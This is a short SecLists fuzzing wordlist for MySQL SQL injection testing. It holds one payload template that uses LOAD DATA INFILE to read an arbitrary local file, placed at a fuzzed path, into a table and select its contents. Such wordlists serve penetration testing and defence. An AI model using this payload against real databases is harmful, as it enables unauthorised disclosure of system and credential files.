SecLists/Fuzzing/Databases/MySQL-Read-Local-Files.fuzzdb.txt
2019-04-10 13:22:39 +01:00

4 lines
210 B
Plaintext

# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;